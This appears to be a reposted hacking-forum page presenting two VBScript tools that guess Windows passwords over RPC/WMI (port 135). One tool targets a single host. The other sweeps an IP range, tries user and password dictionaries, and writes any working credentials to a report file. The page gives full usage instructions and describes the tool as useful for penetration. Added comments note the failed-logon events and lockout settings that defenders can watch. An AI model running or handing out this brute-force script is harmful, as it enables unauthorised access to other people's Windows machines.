135端口扫弱口令的vbs(效率低下)

作者:lcx
来源:vbs小铺

' Script-level error handling: a runtime error does not stop the script; the
' details stay in Err until they are cleared or overwritten. The main loop
' below relies on this to decide whether a Scan call succeeded.
On Error Resume Next
' Shared FileSystemObject used by the file helpers and by Scan.
set fso=CreateObject("Scripting.FileSystemObject")

' filenumshow(filename, i)
' Returns element i (0-based) of the text file `filename` after splitting its
' whole content on CR+LF. Returns Empty when the file does not exist or is
' empty. The entire file is read again on every call.
' Relies on the script-level `fso` object.
Function     filenumshow(filename,i)
Dim     temparray
' Missing file: leave the return value unset (Empty).
if     not     fso.fileExists(filename)     then     exit     Function
' Mode 1 = open for reading.
set     f     =     fso.opentextfile(filename,1)
if     not     f.AtEndofStream     then
tempcnt     =     f.readall
' Lines are assumed to be CRLF-terminated; an LF-only file yields one element.
temparray     =     split(tempcnt,chr(13)&chr(10))
' An index past the end of the array raises a runtime error here; no error
' handling is enabled inside this function, so it surfaces in the caller.
filenumshow=temparray(i)
' NOTE(review): the handle is closed only on this non-empty path.
f.close
End     if
End     Function

' filenum(filename)
' Returns the upper bound (highest 0-based index) of the array obtained by
' splitting the file content on CR+LF, i.e. "number of pieces - 1".
' Returns Empty when the file does not exist or is empty.
' Relies on the script-level `fso` object.
Function     filenum(filename)
Dim     temparray
' Missing file: leave the return value unset (Empty).
if     not     fso.fileExists(filename)     then     exit     Function
' Mode 1 = open for reading.
set     f     =     fso.opentextfile(filename,1)
if     not     f.AtEndofStream     then
tempcnt     =     f.readall
temparray     =     split(tempcnt,chr(13)&chr(10))
' ubound, not a count: a file ending in CRLF produces a trailing empty element.
lineNum=ubound(temparray)
filenum=lineNum
' NOTE(review): the handle is closed only on this non-empty path.
f.close
End     if
End     Function

' Main loop: tries every password in c:\pass.txt for every user name in
' c:\user.txt against one hard-coded host, one WMI connection per pair.
' Both files are re-read in full for every single line fetched, which is the
' inefficiency the page title refers to.
For i=0 To filenum("c:\user.txt")
user=filenumshow("c:\user.txt",i)
' Stop at the first empty entry (for example the blank piece after a final CRLF).
If user="" Then Exit for
For l=0 To     filenum("c:\pass.txt")
pass=filenumshow("c:\pass.txt",l)
' The candidate pair is printed in clear text to the console.
wscript.echo user&Space(5)&pass
Call Scan("192.168.8.10",user,pass,"c:\log.txt")
' Success is inferred only from the absence of a pending error after Scan.
If Err.number=0 Then
wscript.echo "find!!!"
' Leaves the password loop only; the outer loop moves on to the next user.
Exit For
End if
' Failure: print the error details and reset Err before the next attempt.
wscript.echo Err.number&Space(10)&Err.source&Space(10)&Err.Description
Err.clear
next
Next

' Scan(ipaddress, username, password, report)
' Makes one remote WMI connection to \\ipaddress\root\cimv2 with the supplied
' explicit credentials, queries Win32_OperatingSystem, and appends the OS
' caption together with the user name and password to the file `report`.
' No error handling is enabled inside the Sub, so a failed ConnectServer ends
' the Sub and leaves the error for the caller to read from Err.
'
' Defender notes: each call is one network authentication attempt over
' DCOM/WMI. On the target, failed attempts normally show up as failed network
' logons in the Security log (event 4625 on current Windows versions); many
' failures from one source across several account names in a short time is
' the pattern to alert on. Account lockout policy, strong passwords on local
' administrator accounts, and firewall rules limiting inbound RPC/WMI to
' management hosts reduce exposure.
Sub Scan(ipaddress,username,password,report)
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
Set colItems = objswbemservices.ExecQuery("Select * From Win32_OperatingSystem")
' Mode 8 = append, True = create the file if it does not exist.
with fso.opentextfile(report,8,true)
.writeline "==================================================="
For Each objItem in ColItems
.writeline ipaddress & ": " & objItem.Caption
Next
' The report stores the credential pair in clear text; treat the file as sensitive.
.writeline "username:"&username
.writeline "password:"&password
.writeline "==================================================="
.close
end with
end Sub
' Top-level statement: releases the shared FileSystemObject once the main loop has finished.
set fso=nothing

++++++++++++++++++++++++++++++++++++++++++++++++++++++

Enjoy Penetration Testing

' Script-level error handling: runtime errors do not stop the script; the
' code further down reads Err.Number after each Scan call.
on error resume next

' Refuse to run under the GUI host (wscript.exe), where every echo would be a
' message box; the script expects the console host, cscript.exe.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end if
' Five positional arguments are required; otherwise print the banner and usage and exit.
if wscript.arguments.count<5 Then
wscript.echo "RPC_Scan.vbs"
wscript.echo "Code by NetPatch(www.icehack.com) 07.7.5"
wscript.echo "Thx KVO,Lcx"
wscript.echo "use: cscript "&wscript.scriptfullname&" Begin_Ip End_Ip User_dic Pass_dic Report_Path"
wscript.quit
end if

' Main body: walks the last octet of an IPv4 range, checks each address with a
' local Win32_PingStatus query, and for every address that answers iterates
' over the user and password dictionaries, calling Scan for each pair.
Begin_IP=wscript.arguments(0)
End_IP=wscript.arguments(1)
User_Dic=wscript.arguments(2)
Pass_Dic=wscript.arguments(3)
Report_Path=wscript.arguments(4)
' Split both addresses into octets (no limit on pieces, text comparison).
S_Ip = Split(Begin_Ip, ".", -1, 1)
E_Ip =Split(End_Ip, ".", -1, 1)
' Only ranges inside one /24 are accepted: the first three octets must match,
' start <= end, and the end octet must be below 255. Anything else does nothing.
If S_Ip(0) = E_Ip(0) And S_Ip(1) = E_Ip(1) And S_Ip(2) = E_Ip(2) And CInt(S_Ip(3)) <= CInt(E_Ip(3)) And CInt(E_Ip(3)) < 255 Then
SE_Ip=S_Ip(0)&"."&S_Ip(1)&"."&S_Ip(2)
' Local WMI service, used only for the ping query.
Set objPings = GetObject("winmgmts:{impersonationLevel=impersonate}")
' Locator object shared with Scan, which reads it as a script-level variable.
set objlocator=createobject("wbemscripting.swbemlocator")

For num=CInt(S_Ip(3)) To CInt(E_Ip(3))
aMachines = SE_Ip&"."&num

' Reachability check through Win32_PingStatus before any logon attempt is made.
Set objPing=objPings._
ExecQuery("select * from Win32_PingStatus where address = '"_
& aMachines & "'")
For Each objStatus in objPing
' A null status code is treated the same as 0 (reply received).
If IsNull(objStatus.StatusCode) or objStatus.StatusCode = 0 Then
If user_dic <> "" Or pass_dic <> "" Then
set fso=CreateObject("Scripting.FileSystemObject")
' Mode 1 = read, False = do not create the file.
Set file=fso.opentextfile(User_Dic,1,false)
ok=false
do while file.atendofline <> True
' NOTE(review): VBScript names are case-insensitive, so user_dic and pass_dic
' below are the same variables as User_Dic and Pass_Dic, which held the
' dictionary file paths until this point.
user_dic=file.readline
Set files=fso.opentextfile(Pass_Dic,1,false)
do while files.atendofline <> True
pass_dic=files.readline
' Candidate credentials are echoed in clear text to the console.
wscript.echo "Conneting "&aMachines&"...."
wscript.echo "user:"&user_dic
wscript.echo "pass:"&pass_dic
call Scan(aMachines,User_Dic,Pass_Dic,Report_Path)
' No pending error after Scan is taken as success; this leaves the password
' loop only, and the user loop carries on.
If Err.Number = 0 Then Exit Do
Err.clear
Loop
files.close
Loop
file.close
set fso=nothing
End If
Else
WScript.Echo(aMachines & " is not reachable")
End If
Next
Next
End if

' Scan(ipaddress, username, password, report)
' Makes one remote WMI connection to \\ipaddress\root\cimv2 with the supplied
' explicit credentials, queries Win32_OperatingSystem, and appends the OS
' caption together with the user name and password to the file `report`.
' Uses the script-level `objlocator` and `fso` objects created by the main
' body. No error handling is enabled inside the Sub, so a failed
' ConnectServer ends the Sub and leaves the error for the caller to read.
'
' Defender notes: each call is one network authentication attempt over
' DCOM/WMI. On the target, failed attempts normally show up as failed network
' logons in the Security log (event 4625 on current Windows versions); one
' source failing against many hosts or accounts in sequence is the pattern to
' alert on. Account lockout policy and firewall rules limiting inbound
' RPC/WMI to management hosts reduce exposure.
Sub Scan(ipaddress,username,password,report)
set objWservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
Set colItems = objWservices.ExecQuery _
("Select * From Win32_OperatingSystem")
' Mode 8 = append, True = create the file if it does not exist.
with fso.opentextfile(report,8,true)
.writeline "==================================================="
For Each objItem in ColItems
.writeline ipaddress & ": " & objItem.Caption
Next
' The report stores the credential pair in clear text; treat the file as sensitive.
.writeline "username:"&username
.writeline "password:"&password
.writeline "==================================================="
.close
end with
end sub

用法:
cscript RPC_Scan.vbs Begin_Ip End_Ip User_dic Pass_dic Report_Path
Begin_Ip //开始IP
End_Ip //结束IP
User_dic//用户列表
Pass_dic//密码档
Report_Path//输出报告路径

利用RPC(135端口)进行密码猜解
//渗透时比较好使.
